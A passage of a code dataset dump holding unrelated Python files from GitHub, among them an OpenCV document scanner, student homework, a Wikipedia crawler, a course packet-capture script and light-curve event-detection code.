video.set(10,150)\ndef order(point):\n point=point.reshape((4,2))\n newpoint=np.zeros((4,1,2),np.int32)\n add=point.sum(1)\n newpoint[0]=point[np.argmin(add)]\n newpoint[3]=point[np.argmax(add)]\n diff=np.diff(point,axis=1)\n newpoint[1]=point[np.argmin(diff)]\n newpoint[2] = point[np.argmax(diff)]\n return newpoint\n\ndef getWarp(im,big):\n # print(big.shape)\n big=order(big)\n point1=np.float32(big)\n point2=np.float32([[0,0], [width,0], [0,height], [width, height]])\n merge=c.getPerspectiveTransform(point1,point2)\n output=c.warpPerspective(im,merge,(480,640))\n return output\ndef contours(im):\n big = np.array([])\n max = 0\n contour, h = c.findContours(dilation, c.RETR_EXTERNAL, c.CHAIN_APPROX_NONE)\n for con in contour:\n area = c.contourArea(con)\n if area > 5000:\n lenght = c.arcLength(con, True)\n approx = c.approxPolyDP(con, 0.05 * lenght, True)\n max = len(approx)\n if area > max and len(approx) == 4:\n big = approx\n max = area\n c.drawContours(image, big, -1, (0, 0, 255), 20)\n c.imshow('document',image)\n return big\n\nwhile True:\n s,image=video.read()\n imagegray = c.cvtColor(image, c.COLOR_BGR2GRAY)\n blur=c.GaussianBlur(imagegray,(5,5),1)\n canny = c.Canny(blur,200,250)\n kernal=np.ones((5,5))\n dilation=c.dilate(canny,kernal,iterations=2)\n erode=c.erode(dilation,kernal,iterations=1)\n big=contours(erode)\n if len(big)!=0:\n wa= getWarp(image, big)\n c.imshow('Output', wa)\n if(c.waitKey(1) & 0xFF==ord('z')):\n break","repo_name":"Dhana-30/Document_Scanner","sub_path":"Document_Scanner/Document_Scanner.py","file_name":"Document_Scanner.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11248668187","text":"# Из домашнего задания на 18.12.22 - Задача 1\n# Задайте список из нескольких чисел. Напишите программу, которая найдёт сумму элементов списка, стоящих на нечётной позиции.\n# На семинаре вы говорили, что отсчет начинается с 1 (То есть в примере нечетными будут 2, 5, 3). В задании на GeekBrains отчет с 0.\n# Тут предложено оба варианта, но отсчет с 1 является главным решением.\n\n# Старое решение\n\n# table = list(map(int, input(\"Введите числа: \").split(\", \")))\n#\n# result = 0\n# for i in range(len(table)):\n# if (i + 1) % 2 == 1:\n# result += table[i]\n# # if i % 2 == 1:\n# # result += table[i]\n\n# print(result)\n\n# Новое решение. Как оказалось у меня очень мало задач для исправления. Делал что мог.\n\ntable = filter(lambda i : (i[0] + 1) % 2, list(enumerate(list(map(int, input(\"Введите числа: \").split())))))\n\nlisttuple = lambda hello : [i[1] for i in hello]\n\nprint(sum(listtuple(table)))","repo_name":"blackm1n/Homework","sub_path":"15. 15.01.23/Problem 2.py","file_name":"Problem 2.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1845980227","text":"import pathlib\nfrom setuptools import find_packages, setup\n\nhere = pathlib.Path(__file__).parents[0]\n\nlong_description = (here / 'README.md').read_text(encoding='utf-8')\n\nsetup(\n name=\"NoodleExtensions\",\n version=\"2.1.0\",\n license='MIT license',\n description=\"Edit Beat Saber Noodle Extensions level easily using this library.\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n url='https://github.com/megamaz/NoodleExtensions-python',\n author='megamaz',\n author_email=\"raphael.mazuel@gmail.com\",\n classifiers = [\n 'Development Status :: 4 - Beta',\n # 'Programming Language :: Python :: 3.8'\n 'Programming Language :: Python :: 3.9'\n ],\n keywords='Beat Saber, Noodle Extensions',\n packages=find_packages(),\n python_requires='>=3.8, <4',\n project_urls={\n 'Bug Reports': 'https://github.com/megamaz/NoodleExtensions-python/issues'\n }\n)","repo_name":"megamaz/noodleExtensions-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31550108853","text":"# coding=utf-8\nimport qi\nfrom PIL import Image\n\nip = \"192.168.252.247\"\n\nsession = qi.Session()\nsession.connect(\"tcp://\" + ip + \":\" + \"9559\")\n\n\"\"\"\nСделает фотку и сохранит ее\n\nhttp://doc.aldebaran.com/2-8/naoqi/vision/alvideodevice.html\n\"\"\"\n\nvideo = session.service(\"ALVideoDevice\")\nvideoClient = video.subscribeCamera(\"myCam\", 0, 2, 11, 10)\nnaoImage = video.getImageRemote(videoClient)\nvideo.releaseImage(videoClient)\nvideo.unsubscribe(videoClient)\n\nimageWidth = naoImage[0]\nimageHeight = naoImage[1]\narray = naoImage[6]\n\nimage_string = str(bytearray(array))\n\nim = Image.frombytes(\"RGB\", (imageWidth, imageHeight), image_string)\nim.save(\"camImage.png\", \"PNG\")\n","repo_name":"Nekolone/nao_projects","sub_path":"all_projects/how_it_works/py_examples/nao_basics/nb5_make_photo.py","file_name":"nb5_make_photo.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"18655082756","text":"dataset =[]\r\n\r\ndef conv_list_toText(data):\r\n text=\"\"\r\n for a in data:\r\n text = text + \" \" + a\r\n return text\r\n\r\ndef getFeatureText(text):\r\n abc=\"\"\r\n with open('newdataset.txt') as fp:\r\n abc = fp.readlines()\r\n\r\n for i in range(len(abc)):\r\n words=abc[i].split()\r\n for word in words:\r\n dataset.append(word.lower())\r\n findings = text.split()\r\n featuretext = \"\"\r\n for wro in findings:\r\n wro = wro.lower()\r\n if wro in dataset:\r\n featuretext = featuretext+ \" \" + wro\r\n\r\n return featuretext\r\n","repo_name":"AhsanAli13503/Enhancement-of-OCR-and-Business-Document-Classification-using-Machine-Learning","sub_path":"creatingword.py","file_name":"creatingword.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14120439655","text":"#!/usr/bin/env python\n# coding: utf-8\n\nfrom bs4 import BeautifulSoup\nimport requests\nfrom requests.packages.urllib3.util.retry import Retry\nfrom requests.adapters import HTTPAdapter\nfrom functions.get_request import get_request\nimport re\n\ndef retrive_metadata_with_doi(doi, email, timeout = (10,60)):\n output = {'error':None,\n 'status': None,\n 'xml':None}\n \n baseurl = 'https://doi.org/'\n# Create headers \n headers = {\n 'User-Agent': \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36\",\n 'Accept-Language': \"en,en-US;q=0,5\",\n 'Accept': \"text/html,application/pdf,application/xhtml+xml,application/xml,text/plain,text/xml,text/json\",\n 'mailto': email,\n 'Accept-Encoding': 'gzip, deflate, compress',\n 'Accept-Charset': 'utf-8, iso-8859-1;q=0.5, *;q=0.1'}\n# Create http session\n http = requests.Session()\n http.headers.update(headers)\n retry_strategy = Retry(\n total=3,\n status_forcelist=[500, 502, 503, 504],\n method_whitelist=[\"GET\"],\n backoff_factor=1,\n )\n adapter = HTTPAdapter(max_retries=retry_strategy)\n http.mount('', adapter)\n# Create timeout\n timeout = (10,60)\n \n url = f'{baseurl}{doi}'\n \n r = get_request(url, http, headers, timeout)\n \n output['status'] = r['status_code']\n output['error'] = r['error']\n \n if r['status_code'] == 200:\n output['xml'] = r['text']\n \n return output\n\ndef parse_fulltextlink_from_doimetadata(xml):\n soup = BeautifulSoup(xml, features=\"html.parser\")\n output = []\n \n pdfLinks = soup.find_all('meta', attrs={'name': re.compile('^citation_pdf')})\n for link in pdfLinks:\n if link.get('content') != '':\n output.append({'URL':link.get('content')\n , 'content-type':'application/pdf'\n }\n )\n\n htmlLinks = soup.find_all('meta', attrs={'name': re.compile('^citation_full')})\n for link in htmlLinks:\n if link.get('content') != '':\n output.append({'URL':link.get('content')\n , 'content-type':'text/html'\n }\n ) \n \n return output\n\ndef extract_fulltextlink_with_doi(doi, email, timeout = (10,60)):\n metadata = retrive_metadata_with_doi(doi, email, timeout = timeout)\n if metadata['xml'] != None:\n output = parse_fulltextlink_from_doimetadata(metadata['xml'])\n else:\n return None\n \n if len(output) == 0:\n return None\n \n return output\n\n","repo_name":"shihikoo/fulltext_extractor","sub_path":"functions/retrive_fulltext_with_doi.py","file_name":"retrive_fulltext_with_doi.py","file_ext":"py","file_size_in_byte":2627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2477035584","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pickle,os\nimport numpy as np\nimport tqdm\nfrom scipy import linalg,stats\nimport sys,os\nfrom os import path\n# In[2]:\n\n\n# This is based on the code found at https://gist.github.com/junpenglao/4d2669d69ddfe1d788318264cdcf0583\nwith open(sys.argv[1],'rb') as file: model,fit,opfit=pickle.load(file)\ndirectory,base=path.split(sys.argv[1])\ntry: \n\toutdirectory=sys.argv[2]\nexcept:\n\tif directory=='': outdirectory='.'\n\telse: outdirectory=directory\nos.makedirs(outdirectory,exist_ok=True)\nvars=fit.constrained_param_names()\nlogp=lambda x: fit.log_prob(fit.unconstrain_pars({var:val for var,val in zip(vars,x)}),adjust_transform=False)\n\n# In[4]:\n#result=Marginal_llk(fit,logp,vars,bounds)\nresult={}\nresult['pars']={key:fit[key] for key in fit.model_pars}\nresult['lp__']=fit['lp__']\n#result['pars']['lp__']=np.asarray([logp(point) for point in tqdm.tqdm(mtrace)])\nresult['maxposterior']=opfit\nresult['maxposterior']['lp__']=fit.log_prob(fit.unconstrain_pars({var:opfit[var] for var in opfit}),adjust_transform=True)\nwith open(path.join(outdirectory,'params_'+base),'wb') as file: pickle.dump(result,file)\n\n# In[ ]:\n\n\n\n\n\n","repo_name":"darcykenworthy/h0analyticcov","sub_path":"extractpars.py","file_name":"extractpars.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40099222253","text":"from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor\nfrom scrapy.item import Item, Field\nimport modify_query\n\nclass url_item(Item):\n url= Field()\n keywords = Field()\n title = Field()\n linksTo = Field()\n\nclass axxelerate_spider(CrawlSpider):\n name = 'axxelerate'\n allowed_domains = ['en.wikipedia.org']\n start_urls = ['https://en.wikipedia.org/wiki/Main_Page']\n rules = (Rule(LxmlLinkExtractor(allow=(allowed_domains)), callback='parse_obj', follow=True),)\n\n def parse_obj(self,response):\n item = url_item()\n item['url'] = response.url\n item['keywords'] = []\n tags = [\"h1\", \"title\", \"article\", \"div\", \"blockquote\", \"td\", \"li\", \"p\", \"span\", \"strong\", \"b\", \"i\"]\n for tag in tags:\n texts = response.xpath(\"//%s/text()\" % (tag)).extract()\n for text in texts:\n text = text.encode(\"latin1\", \"ignore\")\n result = modify_query.query(text)\n item['keywords'] = item['keywords'] + result\n item['title'] = response.xpath(\"//title/text()\").extract_first()\n item['keywords'] = set(item['keywords'])\n item['linksTo'] = []\n for link in LxmlLinkExtractor(allow=(),deny = ()).extract_links(response):\n if link.url.startswith('https://en.wikipedia.org'):\n item['linksTo'].append(link.url)\n return item\n","repo_name":"vipulroxx/Axxelerate","sub_path":"axxelerate/axxelerate/spiders/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"74141517449","text":"# Написати скрипт, який приймає від користувача два числа (int або float) і робить наступне:\n# Кожне введене значення спочатку пробує перевести в int. У разі помилки - пробує перевести в float, а якщо і там ловить\n# помилку - пропонує ввести значення ще раз (зручніше на даному етапі навчання для цього використати цикл while)\n# Виводить результат ділення першого на друге. Якщо при цьому виникає помилка - оброблює її і виводить відповідне\n# повідомлення\n\ninput_needed = True\nfirst_number, second_number = \"\", \"\"\nwhile input_needed:\n print_text = \"\"\n first_number = input(\"Input first number: \")\n second_number = input(\"Input second number: \")\n\n try:\n int(first_number)\n int(second_number)\n except ValueError:\n try:\n float(first_number)\n float(second_number)\n except ValueError:\n print_text = \"Entered incorrect type, try again\"\n else:\n input_needed = False\n print_text = \"At least one of entered values is float\"\n else:\n input_needed = False\n print_text = \"Both entered values are integer\"\n print(print_text)\n\ntry:\n print(f\"{first_number} / {second_number} = {float(first_number) / float(second_number)}\")\nexcept Exception as e:\n print(f\"Error: {e}\")\n","repo_name":"vkovalchuk-91/Python_GeekHub","sub_path":"HT_04/task_01.py","file_name":"task_01.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72315162568","text":"'''\r\n practica1.py\r\n Muestra el tiempo de llegada de los primeros 50 paquetes a la interfaz especificada\r\n como argumento y los vuelca a traza nueva con tiempo actual\r\n\r\n Autor: Javier Ramos \r\n 2019 EPS-UAM\r\n'''\r\n\r\nfrom rc1_pcap import *\r\nimport sys\r\nimport binascii\r\nimport signal\r\nimport argparse\r\nfrom argparse import RawTextHelpFormatter\r\nimport time\r\nimport logging\r\n\r\nETH_FRAME_MAX = 1514\r\nPROMISC = 1\r\nNO_PROMISC = 0\r\nTO_MS = 10\r\nnum_paquete = 0\r\nTIME_OFFSET = 30*60\r\nflag = 0\r\n\r\ndef signal_handler(nsignal,frame):\r\n\tlogging.info('Control C pulsado')\r\n\tif handle:\r\n\t\tpcap_breakloop(handle)\r\n\t\t\r\n\r\ndef procesa_paquete(us,header,data):\r\n\tglobal num_paquete, pdumper, flag\r\n\theader.ts.tv_sec = header.ts.tv_sec + 1800\r\n\tlogging.info('Nuevo paquete de {} bytes capturado a las {}.{}'.format(header.len,header.ts.tv_sec,header.ts.tv_usec))\r\n\tnum_paquete += 1\r\n\t\r\n\tn = args.nbytes\r\n\tif header.len < n:\r\n\t\tn = header.len\r\n\tlogging.info(\"Primeros bytes del paquete: \" + \" \".join('{:02x}'.format(c) for c in data[:n]))\r\n\t\r\n\r\n\tif flag ==1:\r\n\t\tpcap_dump(pdumper, header, data)\r\n\t\r\nif __name__ == \"__main__\":\r\n\tglobal pdumper,args,handle\r\n\tfile_descripter = 0\r\n\r\n\tsignal.signal(signal.SIGINT, signal_handler)\r\n\t\r\n\tparser = argparse.ArgumentParser(description='Captura trafico de una interfaz ( o lee de fichero) y muestra la longitud y timestamp de los 50 primeros paquetes',\r\n\tformatter_class=RawTextHelpFormatter)\r\n\tparser.add_argument('--file', dest='tracefile', default=False,help='Fichero pcap a abrir')\r\n\tparser.add_argument('--itf', dest='interface', default=False,help='Interfaz a abrir')\r\n\tparser.add_argument('--nbytes', dest='nbytes', type=int, default=14,help='Numero de bytes a mostrar por paquete')\r\n\tparser.add_argument('--debug', dest='debug', default=False, action='store_true',help='Activar Debug messages')\r\n\targs = parser.parse_args()\r\n\r\n\r\n\tif len(sys.argv) <= 1:\r\n\t\tparser.print_help()\r\n\t\tsys.exit(-1)\r\n\r\n\tif args.debug:\r\n\t\tlogging.basicConfig(level = logging.DEBUG, format = '[%(asctime)s %(levelname)s]\\t%(message)s')\r\n\telse:\r\n\t\tlogging.basicConfig(level = logging.INFO, format = '[%(asctime)s %(levelname)s]\\t%(message)s')\r\n\r\n\t\r\n\t\r\n\r\n\tif args.tracefile is False and args.interface is False:\r\n\r\n\t\tlogging.error('No se ha especificado interfaz ni fichero')\r\n\t\tparser.print_help()\r\n\t\tsys.exit(-1)\r\n\r\n\r\n\terrbuf = bytearray()\r\n\thandle = None\r\n\tpdumper = None\r\n\tcapture_name = \"captura.\"\r\n\t\r\n\r\n\tif args.interface:\r\n\t\thandle = pcap_open_live(args.interface, ETH_FRAME_MAX,1,100,errbuf)\r\n\t\tcapture_name = capture_name + args.interface + \".\" + str(int(time.time())) + \".pcap\"\r\n\t\tflag = 1\r\n\t\tfile_descripter=pcap_open_dead(DLT_EN10MB, ETH_FRAME_MAX) \t\r\n\t\tpdumper = pcap_dump_open(file_descripter, capture_name)\r\n\r\n\r\n\tif args.tracefile:\r\n\t\tcapture_name = capture_name+args.tracefile\r\n\t\thandle = pcap_open_offline(args.tracefile, errbuf)\r\n\r\n\r\n\tret = pcap_loop(handle, -1, procesa_paquete, None)\r\n\tif ret == -1:\r\n\t\tlogging.error('Error al capturar un paquete')\r\n\telif ret == -2:\r\n\t\tlogging.debug('pcap_breakloop() llamado')\r\n\telif ret == 0:\r\n\t\tlogging.debug('No mas paquetes o limite superado')\r\n\r\n\tlogging.info('{} paquetes procesados'.format(num_paquete))\r\n\tpcap_close(handle)\r\n\r\n\tif flag ==1 :\r\n\t\tpcap_close(file_descripter)\r\n\t\tpcap_dump_close(pdumper)\r\n\r\n\t\r\n\r\n","repo_name":"albaramosp/informaticaUAM","sub_path":"3/REDES_I/P1/practica1.py","file_name":"practica1.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"es","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"2793793841","text":"\"\"\"\nrunclassic400.py\n\nRun script to perform LDA sampling on Classic 400 data.\n\"\"\"\n\nimport sys\nimport numpy as np\nimport scipy.io\nimport gibbs\n\n# First, load in the data\ndatadict = scipy.io.loadmat('data/classic400.mat')\n\n# Extract count data from dict, split into lists\nclassic400data = datadict['classic400']\ndoc_idx, voc_idx = classic400data.nonzero() # load doc, vocab indices\ncounts = classic400data.data # load counts\n\nK = 3 # cardinality of topic space\nM = 400 # number of documents\nV = 6205 # size of the vocabulary\nS = len(counts) # number of nonzero elements in corpus\n\n# Now randomly initialize q,n based on data\nq = np.zeros(shape=(S,K), dtype='int')\nn = np.zeros(shape=(M,K), dtype='int')\n\nfor bi,(m,count) in enumerate(zip(doc_idx,counts)):\n # To randomly assign topics, draw (K-1) ints from the uniform distribution \n # over the interval [0,count). The length of each sub-interval is the topic\n # count assigned to that element of the matrix (note that this\n # automatically includes the possibility of zero counts).\n draws = np.sort(np.append(np.array([0]),np.random.randint(0, count, K-1)))\n subints = np.array([draws[i+1] - draws[i] for i in range(len(draws)-1)])\n subints = np.append(subints, np.array(count-draws[i]))\n np.random.shuffle(subints)\n for zi,subint in enumerate(subints):\n q[bi,zi] += subint\n n[m,zi] += subint\n\n# initialize alpha, beta\n#afv = [1.0, 1.0, 1.0]\n#bfv = [10000.0, 1000.0, 100.0]\n#qfnamev = ['data/c400_q_a0p1_b10000p0_K3.dat',\n# 'data/c400_q_a1p0_b1000p0_K3.dat',\n# 'data/c400_q_a10p0_b100p0_K3.dat']\n#nfnamev = ['data/c400_n_a0p1_b10000p0_K3.dat',\n# 'data/c400_n_a1p0_b1000p0_K3.dat',\n# 'data/c400_n_a10p0_b100p0_K3.dat']\n\na = float(sys.argv[1]) # prefactors on alpha,beta\nb = float(sys.argv[2])\naf = sys.argv[3] # for filenames\nbf = sys.argv[4]\nqfname = 'data/c400_q_a'+af+'_b'+bf+'_K3.dat'\nnfname = 'data/c400_n_a'+af+'_b'+bf+'_K3.dat'\n\nalpha = a*np.ones(K)\nbeta = b*np.ones(V)\n\n# now run 500 epochs\nfor nep in range(500):\n q,n = gibbs.gibbs_epoch(q,n,alpha,beta,doc_idx,voc_idx)\n\n# save the results to file\nnp.savetxt(qfname,np.array(q),fmt='%d')\nnp.savetxt(nfname,np.array(n),fmt='%d')\n","repo_name":"paulrozdeba/CS250B","sub_path":"hw3/runclassic400.py","file_name":"runclassic400.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"21449223600","text":"# -*- coding: utf-8 -*-\n\nimport gevent\nfrom pytest import fixture\n\nfrom huskar_sdk_v2.bootstrap.client import BaseClient\nfrom huskar_sdk_v2.utils import combine\n\n\n@fixture\ndef test_key():\n return 'test_key'\n\n\n@fixture\ndef test_full_path(base_path, test_key):\n return combine(base_path, test_key)\n\n\n@fixture\ndef huskar_client(request, servers, base_path):\n c = BaseClient(servers, '', '', base_path)\n request.addfinalizer(c.stop)\n c.start()\n return c\n\n\ndef test_start_stop(servers, test_key, base_path):\n c = BaseClient(servers, '', '', base_path)\n assert not c.connected\n c.start()\n gevent.sleep(1)\n assert c.connected\n c.stop()\n assert not c.connected\n c.lazy = False\n # will not raise\n c.create(test_key, '1')\n\n c = BaseClient(servers, '', '', base_path, local_mode=True)\n c.create(test_key, '1')\n\n\ndef test_lazy(servers, test_key, base_path):\n c = BaseClient(servers, '', '', base_path, lazy=True)\n assert not c.connected\n c.exists(test_key)\n assert c.connected\n c.stop()\n assert not c.connected\n c.exists(test_key)\n assert c.connected\n\n c.lazy = False\n c.stop()\n assert not c.connected\n assert not c.exists(test_key)\n c.start()\n # will not raise\n c.exists(test_key)\n\n\ndef test_create_delete(huskar_client, test_key, base_path):\n huskar_client.ensure_path(base_path)\n\n huskar_client.create(test_key, '1')\n assert huskar_client.exists(test_key)\n huskar_client.delete(test_key)\n assert not huskar_client.exists(test_key)\n\n\ndef test_set_get(huskar_client, test_key, base_path):\n huskar_client.ensure_path(base_path)\n\n data = 'somedata'\n huskar_client.create(test_key, '1', ephemeral=True)\n huskar_client.set_data(test_key, data)\n value, state = huskar_client.get(test_key)\n assert value == data\n\n\ndef test_exception(huskar_client):\n assert not huskar_client.watch_key('nonesense')\n\n\ndef test_watch_key(huskar_client, test_key, test_full_path):\n huskar_client.client.create(test_full_path, b'1', makepath=True)\n huskar_client.watch_key(test_key)\n\n def handler(*args):\n handler.called = True\n handler.called = False\n\n huskar_client.watched_blinker.signal(test_key).connect(handler)\n huskar_client.client.set(test_full_path, b'changed')\n gevent.sleep(1)\n assert handler.called\n\n handler.called = False\n huskar_client.client.delete(test_full_path)\n gevent.sleep(1)\n assert handler.called\n\n handler.called = False\n huskar_client.client.create(test_full_path, b'1', makepath=True)\n # the signal should be disconnected after this\n huskar_client.stop()\n huskar_client.start()\n huskar_client.client.set(test_full_path, b'changed again')\n gevent.sleep(1)\n huskar_client.client.delete(test_full_path)\n assert not handler.called\n\n\ndef test_watch_path(huskar_client, test_key, test_full_path):\n\n def handler(children):\n handler.children = children\n\n huskar_client.client.create(test_full_path, b'', makepath=True)\n huskar_client.watch_path(test_key, handler)\n\n handler.children = None\n huskar_client.client.create(test_full_path + '/foo', b'', makepath=True)\n gevent.sleep(0.5)\n assert handler.children == ['foo']\n\n handler.children = None\n huskar_client.client.delete(test_full_path + '/foo')\n gevent.sleep(0.5)\n assert handler.children == []\n\n handler.children = None\n huskar_client.client.delete(test_full_path)\n gevent.sleep(0.5)\n assert handler.children is None\n data_watch, children_watch = huskar_client.watched_path[test_key]\n assert not data_watch._stopped\n assert children_watch._stopped\n\n handler.children = None\n huskar_client.client.create(test_full_path + '/bar', b'', makepath=True)\n gevent.sleep(0.5)\n assert handler.children == ['bar']\n assert not data_watch._stopped\n assert not children_watch._stopped\n","repo_name":"huskar-org/huskar-python","sub_path":"tests/test_kazoo_client/test_kazoo_baseclient.py","file_name":"test_kazoo_baseclient.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"71377743368","text":"from library.utils import format_object, logging_indent, ObjectWrapper, extract_wrapped\n\n\nclass OptimizerWrapper(ObjectWrapper):\n\n '''Just for late printing'''\n\n def __init__(self, optimizer, wrapper_info=(), **params):\n super().__init__(optimizer)\n self._params = params\n self._wrapper_info = wrapper_info\n\n def summary(self):\n optimizer = extract_wrapped(self._body, attr_name='optimizer')\n with logging_indent(f\"Optimizer: {format_object(optimizer, **self._params)}\"):\n for wrapper in self._wrapper_info:\n print(wrapper)\n","repo_name":"MiuLab/TaylorGAN","sub_path":"src/core/train/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"16"} +{"seq_id":"5787328060","text":"import numpy as np\nfrom scipy.sparse import diags\nfrom scipy.interpolate import interp1d\n\n## This function finds the indices of the array where an event starts and end given a threshold\ndef flatten(x,y,limit):\n \"\"\"Return the indices of x where the variation in y is greater than limit.\"\"\"\n k = np.ones_like(y)\n dx = np.concatenate([np.diff(x),[x[-2]-x[-1]]])\n Dx = diags([-k,k],[0,1]).todense()\n dy = Dx.dot(y.T)/dx\n dy[0,-1] = dy[0,-2]\n dy = np.asarray(dy)[0]\n \n dy = np.nan_to_num(dy)\n\n for i in range(len(dy)-1):\n if dy[i+1] == 0.:\n if dy[i] < 0.:\n dy[i+1] += -10e-9\n if dy[i] > 0.:\n dy[i+1] += 10e-9\n\n # extremas\n ind = [0]\n for i in range(len(dy)-1):\n if dy[i]*dy[i+1] <= 0:\n ind.append(i+1)\n ind.append(len(dy)-1)\n \n\n dmag = []\n \n\n for i in range(len(ind)-1):\n i0 = ind[i]\n i1 = ind[i+1]\n dm = y[i1]-y[i0]\n dmag.append(dm)\n \n dmag_matrix = np.zeros((len(ind),len(ind)))\n \n \n \n ind_up = []\n ind_dn = []\n\n dni_up = []\n dni_dn = []\n \n dmag_up = []\n dmag_dn = []\n \n \n \n for i in range(len(ind)):\n for j in range(len(ind)):\n if np.abs(y[ind[j]] - y[ind[i]]) > limit and i < j:\n #if i < j:\n dmag_matrix[i,j] = y[ind[j]] - y[ind[i]]\n\n\n aux1 = True\n aux2 = True\n \n mask = np.zeros(dmag_matrix.shape[0])\n i1,j1 = 0,1\n while aux2:\n if np.all(dmag_matrix[:,j1] == mask):\n if j1+1 >= dmag_matrix.shape[1]:\n return ind_up,ind_dn,dni_up,dni_dn,dmag_up,dmag_dn\n j1 += 1\n continue\n if not np.all(dmag_matrix[:,j1] == mask):\n i1 = np.argmax(np.abs(dmag_matrix[:,j1]))\n j2 = j1+1\n i2 = j2-1\n break\n \n while aux1:\n if i1+1 == dmag_matrix.shape[0] or j1+1 == dmag_matrix.shape[1]:\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n break\n if dmag_matrix[i2,j2] == 0:\n j1 = np.where(np.max(np.abs([dmag_matrix[i1,j1],dmag_matrix[i1,j2]])) == np.abs(dmag_matrix[i1,:]))[0]\n while True:\n if type(j1) == np.int64 or type(j1) == int:\n break\n j1 = j1[0]\n if j2+1 == dmag_matrix.shape[1]:\n #stop and save\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n break\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n break\n i2 = j2 - np.abs(j2-j1)\n j2 += 1\n continue\n if dmag_matrix[i1,j1] * dmag_matrix[i2,j2] < 0:\n if dmag_matrix[i1,j1] > 0:\n ind_up.append(ind[i1])\n dni_up.append(ind[j1])\n dmag_up.append(dmag_matrix[i1,j1])\n i1 = i2\n j1 = j2\n j2 = j1 + 1\n i2 = j2 - np.abs(j2-j1)\n continue\n if dmag_matrix[i1,j1] < 0:\n ind_dn.append(ind[i1])\n dni_dn.append(ind[j1])\n dmag_dn.append(dmag_matrix[i1,j1])\n i1 = i2\n j1 = j2\n j2 = j1 + 1\n i2 = j2 - np.abs(j2-j1)\n continue\n if dmag_matrix[i1,j1] * dmag_matrix[i2,j2] > 0:\n j1 = j2\n j2 += 1\n i2 = j2 - 1\n continue\n \n ## ind denotes starting point of event\n ## dni denotes ending point of event\n ## up means it was an increase in magnitude (demagnification)\n ## dn means it was an decrease in magnitude (magnification)\n ## dmag is the variation of the magnitude of the event\n return ind_up, ind_dn, dni_up, dni_dn, dmag_up, dmag_dn\n\n## Interpolate to get the x value where 90% of the variation on the y axis respect to the \"peak\" occurs\ndef events_90(x, y, limit, mag_corr=0.1):\n up_start, dn_start, up_end, dn_end, up_dmag, dn_dmag = flatten(x, y, limit)\n x_starts = []\n x_ends = []\n y_starts = []\n y_ends = []\n flag = []\n ## For the \"up\" events the ending point is modified\n for i in range(len(up_start)):\n f = interp1d(y[up_start[i]:up_end[i]+1], x[up_start[i]:up_end[i]+1], kind='zero')\n x_starts.append(x[up_start[i]])\n x_ends.append(f(y[up_end[i]] - mag_corr))\n y_starts.append(y[up_start[i]])\n y_ends.append(y[up_end[i]] - mag_corr)\n flag.append(\"demag\")\n ## For the \"dn\" events the starting point is modified\n for i in range(len(dn_start)):\n f = interp1d(y[dn_start[i]:dn_end[i]+1], x[dn_start[i]:dn_end[i]+1], kind='zero')\n x_starts.append(f(y[dn_start[i]] - mag_corr))\n x_ends.append(x[dn_end[i]])\n y_starts.append(y[dn_start[i]] - mag_corr)\n y_ends.append(y[dn_end[i]])\n flag.append(\"mag\")\n\n return x_starts, x_ends, y_starts, y_ends, flag\n\n## Interpolate to get the x value where 90% of the variation on the y axis respect to the \"peak\" occurs\ndef events_90_flux(x, y, limit, int_frac=0.9):\n up_start, dn_start, up_end, dn_end, up_dmag, dn_dmag = flatten(x, y, limit)\n x_starts = []\n x_ends = []\n y_starts = []\n y_ends = []\n flag = []\n \n y = 10**(-0.4*y)\n \n ## For the \"up\" events the ending point is modified\n for i in range(len(up_start)):\n f = interp1d(y[up_start[i]:up_end[i]+1], x[up_start[i]:up_end[i]+1], kind='zero')\n x_starts.append(x[up_start[i]])\n x_ends.append(f(y[up_start[i]] + int_frac * (y[up_end[i]]-y[up_start[i]])))\n y_starts.append(y[up_start[i]])\n 